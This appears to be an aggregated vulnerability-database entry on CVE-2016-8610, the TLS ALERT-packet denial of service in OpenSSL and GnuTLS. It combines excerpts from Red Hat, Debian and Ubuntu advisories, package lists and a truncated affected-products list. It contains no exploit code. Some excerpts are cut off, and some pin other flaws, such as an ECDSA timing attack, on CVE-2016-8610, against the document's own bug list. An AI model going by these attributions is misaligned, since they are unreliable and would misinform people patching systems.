Vulnerability from variot - Updated: 2026-03-09 20:19A denial of service flaw was found in OpenSSL 0.9.8, 1.0.1, 1.0.2 through 1.0.2h, and 1.1.0 in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. OpenSSL is prone to denial-of-service vulnerability. Successful exploitation of the issue will cause excessive memory or CPU resource consumption, resulting in a denial-of-service condition. It supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, security hashing algorithm, etc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2017:0286-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2017-0286.html Issue date: 2017-02-20 CVE Names: CVE-2016-8610 CVE-2017-3731 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
An integer underflow leading to an out of bounds read flaw was found in OpenSSL. (CVE-2016-8610)
-
Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS 1416852 - CVE-2017-3731 openssl: Truncated packet could crash via OOB read
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-48.el6_8.4.src.rpm
i386: openssl-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.4.i686.rpm openssl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-devel-1.0.1e-48.el6_8.4.i686.rpm openssl-perl-1.0.1e-48.el6_8.4.i686.rpm openssl-static-1.0.1e-48.el6_8.4.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.4.i686.rpm openssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-static-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-48.el6_8.4.src.rpm
x86_64: openssl-1.0.1e-48.el6_8.4.i686.rpm openssl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.4.i686.rpm openssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-static-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-48.el6_8.4.src.rpm
i386: openssl-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-devel-1.0.1e-48.el6_8.4.i686.rpm
ppc64: openssl-1.0.1e-48.el6_8.4.ppc.rpm openssl-1.0.1e-48.el6_8.4.ppc64.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.ppc.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.ppc64.rpm openssl-devel-1.0.1e-48.el6_8.4.ppc.rpm openssl-devel-1.0.1e-48.el6_8.4.ppc64.rpm
s390x: openssl-1.0.1e-48.el6_8.4.s390.rpm openssl-1.0.1e-48.el6_8.4.s390x.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.s390.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.s390x.rpm openssl-devel-1.0.1e-48.el6_8.4.s390.rpm openssl-devel-1.0.1e-48.el6_8.4.s390x.rpm
x86_64: openssl-1.0.1e-48.el6_8.4.i686.rpm openssl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.4.i686.rpm openssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-perl-1.0.1e-48.el6_8.4.i686.rpm openssl-static-1.0.1e-48.el6_8.4.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-48.el6_8.4.ppc64.rpm openssl-perl-1.0.1e-48.el6_8.4.ppc64.rpm openssl-static-1.0.1e-48.el6_8.4.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-48.el6_8.4.s390x.rpm openssl-perl-1.0.1e-48.el6_8.4.s390x.rpm openssl-static-1.0.1e-48.el6_8.4.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-static-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-48.el6_8.4.src.rpm
i386: openssl-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-devel-1.0.1e-48.el6_8.4.i686.rpm
x86_64: openssl-1.0.1e-48.el6_8.4.i686.rpm openssl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm openssl-devel-1.0.1e-48.el6_8.4.i686.rpm openssl-devel-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-48.el6_8.4.i686.rpm openssl-perl-1.0.1e-48.el6_8.4.i686.rpm openssl-static-1.0.1e-48.el6_8.4.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-48.el6_8.4.x86_64.rpm openssl-perl-1.0.1e-48.el6_8.4.x86_64.rpm openssl-static-1.0.1e-48.el6_8.4.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-60.el7_3.1.src.rpm
x86_64: openssl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-libs-1.0.1e-60.el7_3.1.i686.rpm openssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-devel-1.0.1e-60.el7_3.1.i686.rpm openssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm openssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-static-1.0.1e-60.el7_3.1.i686.rpm openssl-static-1.0.1e-60.el7_3.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-60.el7_3.1.src.rpm
x86_64: openssl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-libs-1.0.1e-60.el7_3.1.i686.rpm openssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-devel-1.0.1e-60.el7_3.1.i686.rpm openssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm openssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-static-1.0.1e-60.el7_3.1.i686.rpm openssl-static-1.0.1e-60.el7_3.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-60.el7_3.1.src.rpm
aarch64: openssl-1.0.1e-60.el7_3.1.aarch64.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.aarch64.rpm openssl-devel-1.0.1e-60.el7_3.1.aarch64.rpm openssl-libs-1.0.1e-60.el7_3.1.aarch64.rpm
ppc64: openssl-1.0.1e-60.el7_3.1.ppc64.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.ppc.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.ppc64.rpm openssl-devel-1.0.1e-60.el7_3.1.ppc.rpm openssl-devel-1.0.1e-60.el7_3.1.ppc64.rpm openssl-libs-1.0.1e-60.el7_3.1.ppc.rpm openssl-libs-1.0.1e-60.el7_3.1.ppc64.rpm
ppc64le: openssl-1.0.1e-60.el7_3.1.ppc64le.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.ppc64le.rpm openssl-devel-1.0.1e-60.el7_3.1.ppc64le.rpm openssl-libs-1.0.1e-60.el7_3.1.ppc64le.rpm
s390x: openssl-1.0.1e-60.el7_3.1.s390x.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.s390.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.s390x.rpm openssl-devel-1.0.1e-60.el7_3.1.s390.rpm openssl-devel-1.0.1e-60.el7_3.1.s390x.rpm openssl-libs-1.0.1e-60.el7_3.1.s390.rpm openssl-libs-1.0.1e-60.el7_3.1.s390x.rpm
x86_64: openssl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-devel-1.0.1e-60.el7_3.1.i686.rpm openssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm openssl-libs-1.0.1e-60.el7_3.1.i686.rpm openssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: openssl-debuginfo-1.0.1e-60.el7_3.1.aarch64.rpm openssl-perl-1.0.1e-60.el7_3.1.aarch64.rpm openssl-static-1.0.1e-60.el7_3.1.aarch64.rpm
ppc64: openssl-debuginfo-1.0.1e-60.el7_3.1.ppc.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.ppc64.rpm openssl-perl-1.0.1e-60.el7_3.1.ppc64.rpm openssl-static-1.0.1e-60.el7_3.1.ppc.rpm openssl-static-1.0.1e-60.el7_3.1.ppc64.rpm
ppc64le: openssl-debuginfo-1.0.1e-60.el7_3.1.ppc64le.rpm openssl-perl-1.0.1e-60.el7_3.1.ppc64le.rpm openssl-static-1.0.1e-60.el7_3.1.ppc64le.rpm
s390x: openssl-debuginfo-1.0.1e-60.el7_3.1.s390.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.s390x.rpm openssl-perl-1.0.1e-60.el7_3.1.s390x.rpm openssl-static-1.0.1e-60.el7_3.1.s390.rpm openssl-static-1.0.1e-60.el7_3.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-static-1.0.1e-60.el7_3.1.i686.rpm openssl-static-1.0.1e-60.el7_3.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-60.el7_3.1.src.rpm
x86_64: openssl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-devel-1.0.1e-60.el7_3.1.i686.rpm openssl-devel-1.0.1e-60.el7_3.1.x86_64.rpm openssl-libs-1.0.1e-60.el7_3.1.i686.rpm openssl-libs-1.0.1e-60.el7_3.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-60.el7_3.1.i686.rpm openssl-debuginfo-1.0.1e-60.el7_3.1.x86_64.rpm openssl-perl-1.0.1e-60.el7_3.1.x86_64.rpm openssl-static-1.0.1e-60.el7_3.1.i686.rpm openssl-static-1.0.1e-60.el7_3.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2016-8610 https://access.redhat.com/security/cve/CVE-2017-3731 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv/20170126.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFYqs1TXlSAg2UNWIIRAt7bAJ0ZCDFTFcNP3/qrBxA46aRJQAvxkACaA9Ak 1zK4rWazcUYTZw5zQhD4SXA= =I+Z7 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
Security Fix(es):
-
A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)
-
It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. (CVE-2016-0736)
-
It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. (CVE-2016-2161)
-
A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys. (CVE-2016-8610)
-
It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)
-
A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. (CVE-2016-8740)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304. After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/):
1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth 1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS 1401528 - CVE-2016-8740 httpd: Incomplete handling of LimitRequestFields directive in mod_http2 1406744 - CVE-2016-0736 httpd: Padding Oracle in Apache mod_session_crypto 1406753 - CVE-2016-2161 httpd: DoS vulnerability in mod_auth_digest 1406822 - CVE-2016-8743 httpd: Apache HTTP Request Parsing Whitespace Defects 1412120 - CVE-2016-7056 openssl: ECDSA P-256 timing attack key recovery
- JIRA issues fixed (https://issues.jboss.org/):
JBCS-319 - Errata for httpd 2.4.23 SP1 RHEL 7
Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. If sendfile processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could lead to invalid responses or information disclosure. (CVE-2017-5647)
- A vulnerability was discovered in the error page mechanism in Tomcat's DefaultServlet implementation. A crafted HTTP request could cause undesired side effects, possibly including the removal or replacement of the custom error page. Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
CVE-2016-8610
It was discovered that no limit was imposed on alert packets during
an SSL handshake.
CVE-2017-3731
Robert Swiecki discovered that the RC4-MD5 cipher when running on
32 bit systems could be forced into an out-of-bounds read, resulting
in denial of service.
For the stable distribution (jessie), these problems have been fixed in version 1.0.1t-1+deb8u6.
For the unstable distribution (sid), these problems have been fixed in version 1.1.0d-1 of the openssl source package and in version 1.0.2k-1 of the openssl1.0 source package.
We recommend that you upgrade your openssl packages. 6) - i386, x86_64
The following packages have been upgraded to a later upstream version: gnutls (2.12.23). (CVE-2016-8610)
- Multiple flaws were found in the way gnutls processed OpenPGP certificates. An attacker could create specially crafted OpenPGP certificates which, when parsed by gnutls, would cause it to crash. Bugs fixed (https://bugzilla.redhat.com/):
1320982 - ASSERT failure in gnutls-cli-debug 1321112 - DHE_DSS ciphers don't work with client certificates and OpenSSL using TLSv1.2 1323215 - gnutls-serv --http crashes with client certificates with NSS client 1326073 - GnuTLS prefers SHA-1 signatures in TLSv1.2 1326389 - GnuTLS server does not accept SHA-384 and SHA-512 Certificate Verify signatures despite advertising support for them 1326886 - GnuTLS server rejects connections that do not advertise support for SHA-1 signature algorithms 1327656 - gnutls-serv: closing connection without sending an Alert message 1328205 - gnutls-cli won't send certificates that don't match hashes in Certificate Request 1333521 - Provide ability to set the expected server name in gnutls-serv utility 1335924 - gnutls: Disable TLS connections with less than 1024-bit DH parameters 1337460 - Disable/remove export ciphersuites in GnuTLS 1384743 - CVE-2016-8610 SSL/TLS: Malformed plain-text ALERT packets could cause remote DoS 1411836 - CVE-2017-5337 gnutls: Heap read overflow in read-packet.c 1412235 - CVE-2017-5335 gnutls: Out of memory while parsing crafted OpenPGP certificate 1412236 - CVE-2017-5336 gnutls: Stack overflow in cdk_pk_get_keyid 1415682 - Changes introduced by rebase to 2.12.23 break API and ABI compatibility for some libraries
6.
Ubuntu Security Notice USN-3183-2 March 20, 2017
gnutls26 vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
GnuTLS could be made to hang if it received specially crafted network traffic.
Software Description: - gnutls26: GNU TLS library
Details:
USN-3183-1 fixed CVE-2016-8610 in GnuTLS in Ubuntu 16.04 LTS and Ubuntu 16.10. This update provides the corresponding update for Ubuntu 12.04 LTS and Ubuntu 14.04 LTS.
Original advisory details:
Stefan Buehler discovered that GnuTLS incorrectly verified the serial length of OCSP responses. This issue only applied to Ubuntu 16.04 LTS. (CVE-2016-7444) Shi Lei discovered that GnuTLS incorrectly handled certain warning alerts. This issue has only been addressed in Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2016-8610) It was discovered that GnuTLS incorrectly decoded X.509 certificates with a Proxy Certificate Information extension. This issue only affected Ubuntu 16.04 LTS and Ubuntu 16.10. (CVE-2017-5334) It was discovered that GnuTLS incorrectly handled certain OpenPGP certificates. (CVE-2017-5335, CVE-2017-5336, CVE-2017-5337)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libgnutls26 2.12.23-12ubuntu2.7
Ubuntu 12.04 LTS: libgnutls26 2.12.14-5ubuntu3.14
In general, a standard system update will make all the necessary changes
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 1.6,
"vendor": "openssl",
"version": "1.0.1"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 1.6,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "snapcenter server",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "m12-2s",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3070"
},
{
"_id": null,
"model": "m12-1",
"scope": "gte",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3000"
},
{
"_id": null,
"model": "m10-4s",
"scope": "gte",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3000"
},
{
"_id": null,
"model": "m10-4",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3070"
},
{
"_id": null,
"model": "data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "jboss enterprise application platform",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0.0"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "lte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.40"
},
{
"_id": null,
"model": "smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3.0.0"
},
{
"_id": null,
"model": "m12-2s",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp2361"
},
{
"_id": null,
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "m12-2",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp2361"
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "11.0"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.3.3"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "oncommand unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "m12-2s",
"scope": "gte",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3000"
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "m10-4",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp2361"
},
{
"_id": null,
"model": "m12-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3070"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "core rdbms",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18c"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "core rdbms",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "m10-4",
"scope": "gte",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3000"
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.4"
},
{
"_id": null,
"model": "cn1610",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"_id": null,
"model": "openssl",
"scope": "eq",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.0"
},
{
"_id": null,
"model": "adaptive access manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.1.2.3.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"_id": null,
"model": "storagegrid webscale",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "m10-4s",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp2361"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"_id": null,
"model": "pan-os",
"scope": "gte",
"trust": 1.0,
"vendor": "paloaltonetworks",
"version": "7.1.0"
},
{
"_id": null,
"model": "openssl",
"scope": "lte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.2h"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "data ontap edge",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "retail predictive application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0.3"
},
{
"_id": null,
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "pan-os",
"scope": "lte",
"trust": 1.0,
"vendor": "paloaltonetworks",
"version": "7.1.10"
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "m10-1",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp2361"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "jboss enterprise application platform",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.4.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.3.6.0.0"
},
{
"_id": null,
"model": "enterprise manager ops center",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.4.0"
},
{
"_id": null,
"model": "m12-2",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3070"
},
{
"_id": null,
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"_id": null,
"model": "oncommand balance",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.5"
},
{
"_id": null,
"model": "storagegrid",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "retail predictive application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0.3"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "m10-1",
"scope": "gte",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3000"
},
{
"_id": null,
"model": "timesten in-memory database",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1.4.1.0"
},
{
"_id": null,
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.0.2"
},
{
"_id": null,
"model": "communications ip service activator",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.0"
},
{
"_id": null,
"model": "goldengate application adapters",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.3.2.1.0"
},
{
"_id": null,
"model": "clustered data ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "m10-4s",
"scope": "lt",
"trust": 1.0,
"vendor": "fujitsu",
"version": "xcp3070"
},
{
